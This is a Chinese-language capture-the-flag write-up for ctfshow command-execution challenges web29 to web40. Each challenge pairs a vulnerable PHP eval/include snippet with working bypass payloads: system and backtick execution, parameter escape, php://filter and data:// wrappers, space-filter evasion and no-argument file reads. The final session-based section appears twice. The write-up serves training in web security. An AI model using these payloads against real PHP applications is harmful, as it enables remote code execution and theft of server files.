ctfshow-web入门——命令执行（1）（web29-web40）

命令执行（1）

web 29

error_reporting(0);
if(isset($_GET['c'])){  // get传参不为空，执行if语句
    $c = $_GET['c'];    // get传参，赋值给变量c
    if(!preg_match("/flag/i", $c)){ // 过滤flag，模式分隔符后的"i"标记这是一个大小写不敏感的搜索
        eval($c);
    }
}else{
    highlight_file(__FILE__);
} 

• error_reporting()函数

设置 PHP 的报错级别并返回当前级别。
error_reporting(-1)：表示显示所有PHP错误报告。

error_reporting(0); 表示关闭所有PHP错误报告，即禁用报错报告。

• isset()函数

判断变量是否声明。

• preg_match()函数

int preg_match ( string $pattern , string $subject [, array &$matches [, int $flags = 0 [, int $offset = 0 ]]] )

1.搜索 subject 与 pattern 给定的正则表达式的一个匹配。

• $pattern: 要搜索的模式，字符串形式。
• $subject: 输入字符串。

2.返回值为 pattern 的匹配次数。 它的值将是 0 次（不匹配）或 1 次，因为 preg_match() 在第一次匹配后 将会停止搜索。

3.preg_match_all() 不同于此，它会一直搜索subject 直到到达结尾。

4.如果发生错误preg_match()返回 FALSE。

• eval()函数

将字符串按照 PHP 代码来执行，该字符串必须是合法的 PHP 代码，且必须以分号结尾。

• 绕过方法

方法1-直接执行系统命令

?c=system('ls');
?c=system("cat fl*g.php");
?c=system("tac fl*g.php");
?c=system("nl fla*");
?c=system("nl fla?g.php");

• system()—执行shell命令也就是向dos发送一条指令。

• cat命令读取文件的内容并将内容连续（concatenate）输出到标准输出，用于查看文件的内容。

• tac命令和cat命令的功能一样，区别是cat将文件从第一行到最后一行连续显示到屏幕上，而tac则正好相反，从最后一行到第一行反向输出到屏幕上。

• nl (Number of Lines) 将指定的文件添加行号标注后写到标准输出。如果不指定文件或指定文件为"-" ，程序将从标准输入读取数据。

  其默认的结果与cat有点不太一样,nl可以自定义行号显示效果(比如行号的位数和自动补全0)

• '?‘和’*'都可以表示占位符，

  ?代表一个字符

  *代表一串字符

【cat需要查看源代码拿到flag】

方法2-内敛执行

?c=echo `tac f*`;
?c=echo `nl fl''ag.php`;
?c=echo `nl fl“”ag.php`;
?c=echo `nl fl\ag.php`;

• 内敛执行：将``或$()内命令的输出作为输入执行
• 在php中，反引号作用和system类似

方法3-利用cp命令将flag拷贝到其他文件，再访问

?c=system("cp fla?.php 1.txt");
访问1.txt

方法4-利用参数逃逸(eval)

?c=eval($_GET[1]);&1=phpinfo();
?c=eval($_GET[1]);&1=phpinfo()?>
?c=eval($_GET[1]);&1=system('nl flag.php');

方法5-利用参数逃逸(include)

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

web 30

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){ // 过滤了flag，system
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
} 

1.命令执行函数

system()：执行外部程序并显示输出资料。

passthru()：passthru与system的区别，passthru直接将结果输出到浏览器，不返回任何值，且其可以输出二进制，比如图像数据。

exec()：执行外部程序。

shell_exec()，popen()：打开文件。

proc_open()，pcntl_exec()

2.payload:

payload:
?c=echo `cat fl*`;
只是其一，还有很多方法

web 31

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        // 过滤掉flag，system，php，cat，sort，shell，点号，空格，单引号
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

1.嵌套eval执行，相当于参数逃逸

用一个跳板，传进去另一个参数，让其执行另一个参数的值，但是新的参数已经脱离了正则判断

2.绕过cat

tac more less head tac tail nl od(二进制查看) vi vim sort uniq

more:一页一页的显示档案内容
less:与 more 类似 head:查看头几行
tac:从最后一行开始显示，可以看出 tac 是
cat 的反向显示
tail:查看尾几行
nl：显示的时候，顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器，这个也可以查看
vim:一种编辑器，这个也可以查看
sort:可以查看
uniq:可以查看 file -f:报错出具体内容 grep

3.绕过空格

%09 <> ${IFS} $IFS$9 $IFS$

4.payload

payload:?c=eval($_GET[1]);&1=system("tac f*");
只是其一，还有很多方法

web 32

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        // 也过滤了分号和左边的括号
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

1.include

include逃逸参数 ： ?c=include%0a$_GET[1]?>&1= // %0a换行符

include没有分号分隔，所以只是包含，并没有输出，文件包含的思路来做

include可以不用括号，分号可以用?>代替，include函数传入的参数不能执行系统命令

2.filter

利用文件包含插件LFI ： php://filter/convert.base64-encode/resource= 变相读取任意文件

filter：过滤器或伪协议，通过指定的一个通道，来读取某个文件或者资源

读到的资源先用base64编码，不编码，是看不到源文件的

3.php://filter

resource=<要过滤的数据流> 指定了你要筛选过滤的数据流。 必选
read=<读链的筛选列表> 可以设定一个或多个过滤器名称，以管道符（）分隔。 可选
write=<写链的筛选列表> 可以设定一个或多个过滤器名称，以管道符（）分隔。 可选
<；两个链的筛选列表> 任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。

4.payload

payload: 
?c=include%0A$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

web33

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
} 

1.require

在PHP中，有两种包含外部文件的方式，分别是include和require。

主要区别：如果文件不存在或发生了错误，require产生E_COMPILE_ERROR级别的错误，程序停止运行。而include只产生警告，脚本会继续执行。

2.payload

payload:
?c=require%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

web34

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

1.多过滤了冒号，不影响参数逃逸和伪协议的使用

2.payload

payload:
?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

web35

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

1.多过滤了左尖括号和等号，同上

2.payload

payload:
?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

web36

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

1.过滤了数字0-9，可以将参数逃逸，1改为a

注意：%0a是换行符，url解码出来直接是换行符，不包含0

2.payload

payload:
?c=include%0a$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php

web37

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        // 题目过滤了flag，使用了include文件包含
        echo $flag;
    
    }

}else{
    highlight_file(__FILE__);
}

1.data伪协议

• php伪协议，伪协议把后面的字符作为php代码执行
• data:// 类似于php://input，可以让用户来控制输入流，当它与包含函数结合时，用户输入的data://流会被当作php文件执行。从而导致任意代码执行。

data://text/plain;base64,xxxx(base64编码后的数据)

• ？？？：还可以配合UA头执行日志包含,?c=/var/log/nginx/access.log[疑问点]

2.payload

payload:
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZioiKTs/Pg== 
此处也可以不利用base64编码

base64编码：
<?php system("tac f*"); 或者php system("nl f*");?>

注意system语句后面的分号

web38

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    
    }

}else{
    highlight_file(__FILE__);
}

1.题目分析

• 过滤了flag,php,file
• 这里可以同样使用上题的data伪协议的base64编码，但是也可以利用短标签
• <?=是PHP的一个短的开放式标签，是echo()的快捷用法。

2.payload

payload：
?c=data://text/plain,<?=system("cp fla* 1.txt");?>
再访问1.txt

web39

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}

1.着重理解代码执行和文件包含的关系

通过后缀限制了include，但是仍然可以使用data伪协议，data://text/plain相当于执行了php语句，至于.php，由于前面的语句已经闭合了，所以后面的.php会被当成html页面直接显示在页面上，就不再起作用了！！

2.payload

payload:
?c=data://text/plain,<?=system("tac fl*";)?>

web40

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\（|\）|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
        
}else{
    highlight_file(__FILE__);
} 

// 没有过滤字母，分号，英文括号，下划线

方法1.无参数文件读取

通过货币信息取点，扫描当前目录，把目录结果进行翻转，取下一个，再显示源码

payload:
show_source(next(array_reverse(scandir(pos(localeconv()))))); 
highlight_file(next(array_reverse(scandir(pos(localeconv())))));

highlight_file()函数：对文件进行 PHP 语法高亮显示。语法通过使用 HTML 标签进行高亮。

show_source(): highlight_file() 的别名。

array_reverse()：将数组逆序排列

scandir()：函数返回一个数组，其中包含指定路径中的文件和目录(获取目录下的文件)

localeconv()：返回一包含本地数字及货币格式信息的数组。其中数组中的第一个为点号(.)

pos()：返回数组中的当前元素的值

next()： 函数将内部指针指向数组中的下一个元素，并输出。

先用**print_r(scandir(current(localeconv())));**打印出当前目录下文件，发现flag.php，将其打印显示出来

方法2.构造数组+rce:远程代码执行

打印当前所有变量 print_r(get_defined_vars());

get_defined_vars() ：函数返回由所有已定义变量所组成的数组。

拿到数组，再拿数组值，数组弹出并打印：print(array_pop(next(get_defined_vars())));

array_pop() 函数删除数组中的最后一个元素。

payload:
eval(array_pop(next(get_defined_vars())));
post传参:1=system("tac fla?.php");

方法3.利用session

• Session就是保存在服务器的文本文件。
• 每一次SESSION会话都有一个SESSION ID，用来识别不同的会话，保存在浏览器Cookie之中，也就是这个名为PHPSESSID的Cookie（可以修改）。
• 浏览器将Cookie（包括PHPSESSID）发送给服务器，PHP才知道应该使用哪一个SESSION传递给PHP程序。

payload:
?c=show_source(session_id(session_start()));
cookie为PHPSESSID=flag.php

session_start(): 告诉PHP使用session;
session_id(): 获取到当前的session_id值；

但是此题无法获取flag，受php版本影响 5.5 -7.1.9均可以执行。因为session_id规定为0-9，a-z,A-Z,-中的字符，在5.5以下及7.1以上均无法写入除此之外的内容。但是符合要求的字符还是可以的。

更多知识点参考：先知社区https://xz.aliyun.com/t/10947
`

方法3.利用session

• Session就是保存在服务器的文本文件。
• 每一次SESSION会话都有一个SESSION ID，用来识别不同的会话，保存在浏览器Cookie之中，也就是这个名为PHPSESSID的Cookie（可以修改）。
• 浏览器将Cookie（包括PHPSESSID）发送给服务器，PHP才知道应该使用哪一个SESSION传递给PHP程序。

payload:
?c=show_source(session_id(session_start()));
cookie为PHPSESSID=flag.php

session_start(): 告诉PHP使用session;
session_id(): 获取到当前的session_id值；

但是此题无法获取flag，受php版本影响 5.5 -7.1.9均可以执行。因为session_id规定为0-9，a-z,A-Z,-中的字符，在5.5以下及7.1以上均无法写入除此之外的内容。但是符合要求的字符还是可以的。

更多知识点参考：先知社区https://xz.aliyun.com/t/10947